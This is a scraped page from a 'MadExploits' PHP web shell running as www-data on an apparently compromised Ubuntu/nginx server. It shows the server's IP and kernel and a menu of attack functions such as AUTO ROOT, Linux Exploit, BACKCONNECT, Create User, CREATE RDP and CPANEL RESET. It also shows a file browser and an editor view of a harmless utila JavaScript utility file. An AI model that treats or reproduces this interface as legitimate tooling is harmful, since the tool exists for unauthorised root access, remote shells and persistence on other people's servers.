Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
utila /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
Emitter.js
3.42
KB
-rw-rw-rw-
_common.js
2.42
KB
-rw-rw-rw-
array.js
3.52
KB
-rw-rw-rw-
classic.js
2.97
KB
-rw-rw-rw-
object.js
3.75
KB
-rw-rw-rw-
string.js
272
B
-rw-rw-rw-
utila.js
233
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _common.js
// Generated by CoffeeScript 1.6.3 var common; module.exports = common = { /* Checks to see if o is an object, and it isn't an instance of some class. */ isBareObject: function(o) { if ((o != null) && o.constructor === Object) { return true; } return false; }, /* Returns type of an object, including: undefined, null, string, number, array, arguments, element, textnode, whitespace, and object */ typeOf: function(item) { var _ref; if (item === null) { return 'null'; } if (typeof item !== 'object') { return typeof item; } if (Array.isArray(item)) { return 'array'; } if (item.nodeName) { if (item.nodeType === 1) { return 'element'; } if (item.nodeType === 3) { return (_ref = /\S/.test(item.nodeValue)) != null ? _ref : { 'textnode': 'whitespace' }; } } else if (typeof item.length === 'number') { if (item.callee) { return 'arguments'; } } return typeof item; }, clone: function(item, includePrototype) { if (includePrototype == null) { includePrototype = false; } switch (common.typeOf(item)) { case 'array': return common._cloneArray(item, includePrototype); case 'object': return common._cloneObject(item, includePrototype); default: return item; } }, /* Deep clone of an object. From MooTools */ _cloneObject: function(o, includePrototype) { var clone, key; if (includePrototype == null) { includePrototype = false; } if (common.isBareObject(o)) { clone = {}; for (key in o) { clone[key] = common.clone(o[key], includePrototype); } return clone; } else { if (!includePrototype) { return o; } if (o instanceof Function) { return o; } clone = Object.create(o.constructor.prototype); for (key in o) { if (o.hasOwnProperty(key)) { clone[key] = common.clone(o[key], includePrototype); } } return clone; } }, /* Deep clone of an array. From MooTools */ _cloneArray: function(a, includePrototype) { var clone, i; if (includePrototype == null) { includePrototype = false; } i = a.length; clone = new Array(i); while (i--) { clone[i] = common.clone(a[i], includePrototype); } return clone; } };
Close